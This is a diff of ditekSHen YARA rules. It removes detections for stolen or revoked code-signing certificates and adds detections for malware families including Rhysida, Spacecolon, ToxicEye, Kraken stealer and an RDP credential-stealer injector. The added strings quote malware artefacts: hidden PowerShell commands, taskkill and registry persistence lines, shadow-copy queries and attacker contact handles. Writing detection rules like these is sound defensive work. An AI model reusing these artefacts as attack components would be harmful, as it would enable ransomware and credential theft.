-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "2 TOY GUYS LLC" and ( pe.signatures [ i ] . serial == "00:81:86:31:11:0b:5d:14:33:1d:ac:7e:6a:d9:98:b9:02" or pe.signatures [ i ] . serial == "81:86:31:11:0b:5d:14:33:1d:ac:7e:6a:d9:98:b9:02" ) )
+		( uint16( 0 ) == 0x5a4d and ( ( 3 of ( $x* ) ) or ( 2 of ( $x* ) and 3 of ( $s* ) ) or ( 1 of ( $x* ) and 5 of ( $s* ) ) or ( 6 of ( $s* ) ) ) ) or ( 10 of them )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_7Ab21306B11Ff280A93Fc445876988Ab : FILE
+rule DITEKSHEN_MALWARE_Win_Rookie_Downloader : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detect malware downlaoder, variant of ZombieBoy downloader"
 		author = "ditekSHen"
-		id = "583fccef-3ad5-5f9a-a030-d6bf9ebed00f"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "a991eecb-5275-5e33-bea4-e709590474a8"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4392-L4403"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10773-L10786"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "aa93d36d472d24cdd937c323ffa048fc71984fcf8a13400618ec8a0f2c172fc0"
+		logic_hash = "6d5625c2cd7e3a51c2fce9948e691ff2d1b7cf85083708790f89e15c6522059b"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "6d0d10933b355ee2d8701510f22aff4a06adbe5b"
-		importance = 20
+		clamav1 = "MALWARE.Win.Trojan.RookIE-Downloader"
+
+	strings:
+		$s1 = "shell:::{2559a1f3-21d7-11d4-bdaf-00c04f60b9f0}" fullword ascii
+		$s2 = "taskkill /f /im hh.exe" fullword ascii
+		$s3 = "RookIE/1.0" fullword ascii
+		$s4 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0" fullword ascii
+		$s5 = "#32770" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ABC BIOS d.o.o." and pe.signatures [ i ] . serial == "7a:b2:13:06:b1:1f:f2:80:a9:3f:c4:45:87:69:88:ab" )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0086909B91F07F9316984D888D1E28Ab76 : FILE
+rule DITEKSHEN_MALWARE_Win_Fiber : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Fiber .NET injector"
 		author = "ditekSHen"
-		id = "58b191cc-82f2-5ad3-8d1e-91c7528880c6"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "0e562e2e-cb91-5acf-bb8f-5e7e7d971a3d"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4405-L4416"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10788-L10824"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "eb8807437edbbba52a928de4ebf0a25513127bd9800088e0d85e41c8375a05b1"
+		logic_hash = "bd6c2c02272fe59c8d7de533197f15d94b5532d32875f01e3e4bd52506456a34"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "5eba3c38e989c7d16c987e2989688d3bd24032bc"
-		importance = 20
+
+	strings:
+		$x1 = "Fiber.dll" fullword ascii
+		$s1 = "-WindowStyle Hidden Copy-Item -Path *.vbs -Destination" wide
+		$s2 = "-WindowStyle Hidden {0} -WindowStyle Hidden Start-Sleep 5; Start-Process {1}" wide
+		$s3 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" wide
+		$s4 = "WScript.Shell" fullword wide
+		$s5 = "{0}_{1:N}.lnk" fullword wide
+		$s6 = "notepad.exe,0" fullword wide
+		$i1 = "AppLaunch.exe" fullword wide
+		$i2 = "aspnet_regbrowsers.exe" fullword wide
+		$i3 = "cvtres.exe" fullword wide
+		$i4 = "ilasm.exe" fullword wide
+		$i5 = "jsc.exe" fullword wide
+		$i6 = "MSBuild.exe" fullword wide
+		$i7 = "RegAsm.exe" fullword wide
+		$i8 = "RegSvcs.exe" fullword wide
+		$v1 = "is tampered" wide
+		$v2 = "Debugger Detected" wide
+		$v3 = "RepositoryUrl" ascii
+		$v4 = { 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00
+                74 00 75 00 61 00 6c 00 20 00 00 0b 41 00 6c 00
+                6c 00 6f 00 63 00 00 0d 57 00 72 00 69 00 74 00
+                65 00 20 00 00 11 50 00 72 00 6f 00 63 00 65 00
+                73 00 73 00 20 00 00 0d 4d 00 65 00 6d 00 6f 00
+                72 00 79 00 00 0f 50 00 72 00 6f 00 74 00 65 00
+                63 00 74 00 00 0b 4f 00 70 00 65 00 6e 00 20 00
+                00 0f 50 00 72 00 6f 00 63 00 65 00 73 00 73 00
+                00 0d 43 00 6c 00 6f 00 73 00 65 00 20 00 00 0d
+                48 00 61 00 6e 00 64 00 6c 00 65 00 00 0f 6b 00
+                65 00 72 00 6e 00 65 00 6c }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Dantherm Intelligent Monitoring A/S" and pe.signatures [ i ] . serial == "00:86:90:9b:91:f0:7f:93:16:98:4d:88:8d:1e:28:ab:76" )
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and 3 of ( $s* ) and 2 of ( $i* ) ) or ( 4 of ( $s* ) and 4 of ( $i* ) ) or ( 2 of ( $s* ) and 6 of ( $i* ) ) or ( 1 of ( $x* ) and 3 of ( $v* ) ) or ( all of ( $v* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00D4Ef1Ab6Ab5D3Cb35E4Efb7984Def7A2 : FILE
+rule DITEKSHEN_MALWARE_Win_Unknown_Packedloader_01 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
-		author = "ditekSHen"
-		id = "d96df78b-3824-5f94-8a32-87dfd9cd585f"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		description = "Detects unknown loader / packer. Observed running LummaStealer"
+		author = "ditekShen"
+		id = "2969090f-dff9-5745-b87d-a031741dd2e0"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4418-L4429"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10826-L10845"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "845abc1f08a4d56b32477fbe8855f45633833c68f4255d0690f10cc23c167e84"
+		logic_hash = "6fd9075793b55e04c68bb13d21b88741889a9c37a0a9d1a19d895c7b68af4506"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "10d82c75a1846ebfb2a0d1abe9c01622bdfabf0a"
-		importance = 20
+
+	strings:
+		$s1 = "Error at hooking API \"%S\"" wide
+		$s2 = "Dumping first %d bytes:" wide
+		$s3 = "Error at initialization of bundled DLL: %s" wide
+		$s4 = "GetMemoryForDLL()" ascii
+		$s5 = "type=activation&code=" ascii
+		$s6 = "activation.php?code=" ascii
+		$s7 = "&hwid=" ascii
+		$s8 = "&hash=" ascii
+		$s9 = "type=deactivation&hash=" ascii
+		$s10 = "deactivation.php?hash=" ascii
+		$s11 = "BANNED" fullword ascii
+		$s12 = "GetAdaptersInfo" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "REIGN BROS ApS" and pe.signatures [ i ] . serial == "00:d4:ef:1a:b6:ab:5d:3c:b3:5e:4e:fb:79:84:de:f7:a2" )
+		uint16( 0 ) == 0x5a4d and 11 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_13039Da3B2924B7A8B0A2Ac4637C2Efa : FILE
+rule DITEKSHEN_MALWARE_Win_LOLKEK : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
-		author = "ditekSHen"
-		id = "9621584b-a115-5b96-8de5-15776232cdb2"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		description = "Detects LOLKEK / GlobeImposter ransowmare"
+		author = "ditekShen"
+		id = "96374c8d-2ef7-5706-a96f-27d60f73f8c1"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4431-L4442"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10847-L10864"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7492f2a50effae809b512ce7a2a769f3db62ab3573974206b729417cc629ca83"
+		logic_hash = "047492f8b7b56c75cfdcc4359de2b02a76cf9591b902171785806987e552995a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "ad9fa264674c152b2298533e41e098bcaa0345af"
-		importance = 20
+
+	strings:
+		$s1 = "$Recycle.bin" fullword wide
+		$s2 = "\\\\?\\%c:" fullword wide
+		$s3 = ".MMM" fullword wide
+		$s4 = "ReadMe.txt" fullword wide
+		$s5 = "select * from Win32_ShadowCopy" fullword wide
+		$s6 = "Win32_ShadowCopy.ID='%s'" fullword wide
+		$s7 = "W3CRYPTO LOCKER" ascii
+		$s8 = "http://mmcb" ascii
+		$s9 = "yip.su/2QstD5" ascii
+		$s10 = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AddInProcess32.exe" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Tekhnokom" and pe.signatures [ i ] . serial == "13:03:9d:a3:b2:92:4b:7a:8b:0a:2a:c4:63:7c:2e:fa" )
+		uint16( 0 ) == 0x5a4d and 7 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_2Abd2Eef14D480Dfea9Ca9Fdd823Cf03 : FILE
+rule DITEKSHEN_MALWARE_Win_Spacecolon : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Spacecolon ransomware"
 		author = "ditekSHen"
-		id = "5e17d055-26d7-5dde-a905-9d03fb164fa2"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "38bde0b6-96a3-5081-b152-c251d7a2ffac"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4444-L4455"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10866-L10886"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5f0f5dac599923f385fcd8e8b14349263cabe1c83242fe097d9fb26ea0567c1a"
+		logic_hash = "d6e55c45f9df98bc152dadc1ba0953b4b89b5a503af0fc5ba53e12a1aa4f6d28"
 		score = 75
-		quality = 75
+		quality = 48
 		tags = "FILE"
-		thumbprint = "db3d9ccf11d8b0d4f33cf4dc93689fdd942f8fbe"
-		importance = 20
+
+	strings:
+		$s1 = "eraseext" fullword ascii
+		$s2 = "*.encrypted" fullword ascii
+		$s3 = "TIMATOMA#" fullword wide
+		$s4 = ".Encrypted" fullword wide
+		$s5 = "Already Encrypted" wide
+		$s6 = "note.txt" fullword wide
+		$s7 = "HOW TO RECOVERY FILES.TXT" fullword wide
+		$s8 = "taskkill /f /im \"" wide nocase
+		$s9 = "\\kill.bat" wide
+		$s10 = "Search cancelled -" fullword wide
+		$s11 = "%d folder(s) searched and %d file(s) found - %.3f second(s)" fullword wide
+		$s12 = "Our TOX ID :" ascii
+		$s13 = "tufhackteam@gmail.com" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BE SOL d.o.o." and pe.signatures [ i ] . serial == "2a:bd:2e:ef:14:d4:80:df:ea:9c:a9:fd:d8:23:cf:03" )
+		uint16( 0 ) == 0x5a4d and 8 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_08622B9Dd9D78E67678Ecc21E026522E : FILE
+rule DITEKSHEN_MALWARE_Win_Rhysida : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Rhysida ransomware"
 		author = "ditekSHen"
-		id = "922282e9-9f34-537b-9fd1-283ae44b9b54"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "a70bdf19-3b56-5dc0-be74-20a2e85099cc"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4457-L4468"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10888-L10902"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7e572c4241d92ad34efd91c3f6338da4093c83d84a734766448ac7cb2a72bc0c"
+		logic_hash = "fb15f497cdee40b237dfc2aafcde2da95ff2a6f9c162273862ec1a0053269932"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "a7d86073742ea55af134e07a00aefa355dc123be"
-		importance = 20
+
+	strings:
+		$s1 = "cmd.exe /c reg add \"HK" ascii
+		$s2 = "rundll32.exe user32.dll,UpdatePerUserSystemParameters" fullword ascii
+		$s3 = "C:/Users/Public/bg.jpg" fullword ascii
+		$s4 = "CriticalBreachDetected.pdf" fullword ascii
+		$s5 = "rhysida" ascii
+		$s6 = "cmd.exe /c reg delete \"HKCU\\Cont" ascii
+		$s7 = "Rhysida-" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Kayak Republic af 2015 APS" and pe.signatures [ i ] . serial == "08:62:2b:9d:d9:d7:8e:67:67:8e:cc:21:e0:26:52:2e" )
+		uint16( 0 ) == 0x5a4d and 5 of ( $s* ) or ( 3 of ( $s* ) and #s1 > 5 )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_5A17D5De74Fd8F09Df596Df3123139Bb : FILE
+rule DITEKSHEN_MALWARE_Win_Povertystealer : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects PovertyStealer"
 		author = "ditekSHen"
-		id = "871d9840-4540-58d3-980e-d356c856dbca"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "a431b82a-81cb-51a9-b3a8-61d71f36a60e"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4470-L4481"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10904-L10917"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f5ff9f7d857da3329708ba9c0bfac0999b04aeb170fb60387f4b48fa6029a641"
+		logic_hash = "0d8a4dd1f3a9935935878840d19e16d91d240da776f99eb2dd3f12df96efa1d9"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "1da887a57dddd7376a18f75841559c9682f78b04"
-		importance = 20
+		clamav1 = "MALWARE.Win.Trojan.PovertyStealer"
+
+	strings:
+		$x1 = "Poverty is the parent of crime." ascii
+		$s2 = "OperationSystem: %d:%d:%d" ascii
+		$s3 = "ScreenSize: {lWidth=%d, lHeight=%d}" ascii
+		$s4 = "VideoAdapter #%d: %s" ascii
+		$s5 = "$d.log" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ACTA FIS d.o.o." and pe.signatures [ i ] . serial == "5a:17:d5:de:74:fd:8f:09:df:59:6d:f3:12:31:39:bb" )
+		(( uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or all of ( $s* ) ) ) or all of them )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_15Da61D7E1A631803431561674Fb9B90 : FILE
+rule DITEKSHEN_MALWARE_Win_Janelarat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects JanelaRAT"
 		author = "ditekSHen"
-		id = "d1fd8200-0960-567d-9bb6-2bd1ed99f61b"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "6a49eeda-307f-5429-aa24-658223360239"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4483-L4494"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10919-L10939"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4d30a4bf1b0425081369351df707be0531dcc1751512d9012a859b621d61a1b3"
+		logic_hash = "9f10112b6ffa382b03511e7b6c8757438d5910ee2c24d650d05bb53abfff3860"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "9a9bc3974e3cbbabdeb2b6debdc0455586e128a4"
-		importance = 20
+
+	strings:
+		$x1 = "<Janela>k__" ascii
+		$x2 = "janela" fullword ascii
+		$x3 = "\\CSHARP\\RAT\\" ascii
+		$s1 = "<SystemInfos>k__" ascii
+		$s2 = "<SendKeepAlives>b__" ascii
+		$s3 = "hookStruct" fullword ascii
+		$s4 = "[^a-zA-Z]" fullword wide
+		$s5 = "GetRecycled" fullword ascii
+		$s6 = "import \"bcl.proto\";" wide
+		$s7 = "\\KL_FINAL\\" ascii
+		$s8 = "\\KL_FASEAVAST" ascii
+		$s9 = "\\kl c++" ascii
+		$s10 = "VisaoAPP" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "JAY DANCE STUDIO d.o.o." and pe.signatures [ i ] . serial == "15:da:61:d7:e1:a6:31:80:34:31:56:16:74:fb:9b:90" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or ( 2 of ( $x* ) and 3 of ( $s* ) ) or ( 1 of ( $x* ) and 5 of ( $s* ) ) or ( 6 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_58Aa64564A50E8B2D6E31D5Cd6250Fde : FILE
+rule DITEKSHEN_MALWARE_Win_Qwixxrat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects QwixxRAT. Uses ToxicEye / TelegramRAT as base (MALWARE_Win_TelegramRAT)"
 		author = "ditekSHen"
-		id = "b6eff323-241a-5f11-837f-bfacdc547d89"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "0a8f2f6f-aa78-56c2-aca0-d575fbf0b91e"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4496-L4507"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10941-L10953"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7383dfc8b22379dc69cd1d93d2da40e177ba1e3b0b8b8891afb8ce594269d170"
+		logic_hash = "e6e44697e393da35215f7835f122cb74b05dbeebb558345d5110d6fbc809f4dd"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "a7b43a5190e6a72c68e20f661f69ddc24b5a2561"
-		importance = 20
+
+	strings:
+		$s1 = /Qwixx(\s)?Stealer/ ascii wide
+		$s2 = "discord.gg/UXVFHzTjYe" wide
+		$s3 = "t.me/QwixxTwixx" wide
+		$s4 = "Secret Qwixx" wide
+		$s5 = "\\Qwixx Rat\\" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Foreground" and pe.signatures [ i ] . serial == "58:aa:64:56:4a:50:e8:b2:d6:e3:1d:5c:d6:25:0f:de" )
+		uint16( 0 ) == 0x5a4d and 2 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00Bbd4Dc3768A51Aa2B3059C1Bad569276 : FILE
+rule DITEKSHEN_MALWARE_Win_Toxiceye : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects ToxicEye / TelegramRAT. Observed used as the basis for many infostealers"
 		author = "ditekSHen"
-		id = "cb5214b4-1af5-5b31-b690-6531139e92b1"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "99304f11-2444-5864-b174-514bb5bef0f7"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4509-L4520"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10955-L10973"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d506c2d6e630fabe1d4b805cd31aa54b04959db80630f656b3460c869ad544fa"
+		logic_hash = "ee01c107dd295b923801c0d1a77b1534d3a5f2abf8d2cfa93c6786a1b0553504"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "36936c4aa401c3bbeb227ce5011ec3bdc02fdd14"
-		importance = 20
+
+	strings:
+		$s1 = "[~] Handling command" wide
+		$s2 = "[?] Sleeping {0}" wide
+		$s3 = "GETPASSWORDS" wide
+		$s4 = "FORKBOMB" wide
+		$s5 = "SENDKEYPRESS" wide
+		$s6 = "KEYLOGGER" wide
+		$s7 = "/ToxicEye/master/TelegramRAT/" wide
+		$s8 = "desktopScreenshot" ascii
+		$s9 = "MeltFile" ascii
+		$s10 = "AutoStealer" ascii
+		$s11 = /\/LimerBoy\/(ToxicEye|Adamantium-Thief|hackpy)/ wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "JJ ELECTRICAL SERVICES LIMITED" and pe.signatures [ i ] . serial == "00:bb:d4:dc:37:68:a5:1a:a2:b3:05:9c:1b:ad:56:92:76" )
+		uint16( 0 ) == 0x5a4d and 7 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_3A236F003Bdefc0C55Aa42D9C6C0B08E : FILE
+rule DITEKSHEN_MALWARE_Win_Rdpcredsstealerinjector : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects RDP Credentials Stealer injector"
 		author = "ditekSHen"
-		id = "02c95d8f-f694-5d0f-bf79-b806334e8af3"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "221b7d64-6585-5f3a-bffa-bde05390db73"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4522-L4533"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10994-L11007"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9930b2d3fdbd2f6da17d78dfbfe6229f0bd004686e4cc4960720710241237e48"
+		logic_hash = "0dfade8dde987f5134158b7c4abc3eaf8dcece86e1ff2ab1da4466da316939a2"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "5ba147ebae6089f99823b1640c305b337b1a4c36"
-		importance = 20
+		clamav1 = "MALWARE.Win.Trojan.RDPCredsStealer-Injector"
+
+	strings:
+		$s1 = "\\APIHookInjectorBin\\" ascii
+		$s2 = "\\RDPCredsStealerDLL.dll" ascii
+		$s3 = "DLL Injected" ascii
+		$s4 = "Code Injected" ascii
+		$s5 = /(OpenProcess|VirtualAllocEx|CreateRemoteThread)\(\) failed:/ fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Assurio" and pe.signatures [ i ] . serial == "3a:23:6f:00:3b:de:fc:0c:55:aa:42:d9:c6:c0:b0:8e" )
+		uint16( 0 ) == 0x5a4d and 3 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_010000000001302693Cb45 : FILE
+rule DITEKSHEN_MALWARE_Win_Krakenstealer : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detect Kraken infostealer"
 		author = "ditekSHen"
-		id = "0ab8e30d-dd75-5dd1-9bc8-413e59d5d310"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "460eb574-99c9-5f78-9efa-7a8808aaaae7"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4535-L4547"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11009-L11030"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		hash = "74069d20e8b8299590420c9af2fdc8856c14d94929c285948585fc89ab2f938f"
-		logic_hash = "74c5d88012ab3e975123cde51ae3d01b6bee1ad0d6c0f5492c507fb2472b7532"
+		logic_hash = "7f15823db706e6e51d8ea58fb026efb49f42234255d2f448614dc645d12648bb"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "bc5fcb5a2b5e0609e2609cff5e272330f79b2375"
-		importance = 20
+		snort = "923828002"
+
+	strings:
+		$x1 = /Kraken(_)?(Stub|Keyboard|Clipboard|GeneratorMachine|PostLogs|Screenshot|Keylogs|Password)/ ascii wide
+		$s1 = /(get|set)_(Clipboard|Keyboard|Screen)Recorder/ fullword ascii
+		$s2 = /Dumping(FileZilla|360_China|Opera|Epic|CocCoc|Thunderbird|Brave)/ fullword ascii
+		$s3 = "ScreenPostData" fullword ascii
+		$s4 = "encrypt_data" fullword ascii
+		$s5 = "KeyboardProc" fullword ascii
+		$s6 = "UploadsKeyboard" fullword ascii
+		$s7 = "ClpUploader" fullword ascii
+		$s8 = "StartKeylogger" fullword ascii
+		$s9 = "ClipoDetectedRemover" fullword ascii
+		$s10 = "Disable_Regis" fullword ascii
+		$s11 = "RecordedClips" fullword ascii
+		$s12 = "HoneyPotStatus" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AutoIt Consulting Ltd" and pe.signatures [ i ] . serial == "01:00:00:00:00:01:30:26:93:cb:45" )
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and 2 of ( $s* ) ) or 9 of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_3F8D23C136Ae9Cbeeac7605B24Ec0391 : FILE
+rule DITEKSHEN_MALWARE_Win_Whiffyrecon : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Whiffy Recon"
 		author = "ditekSHen"
-		id = "86617b78-86b0-59dc-a072-cb4acecd60e1"
-		date = "2020-11-19"
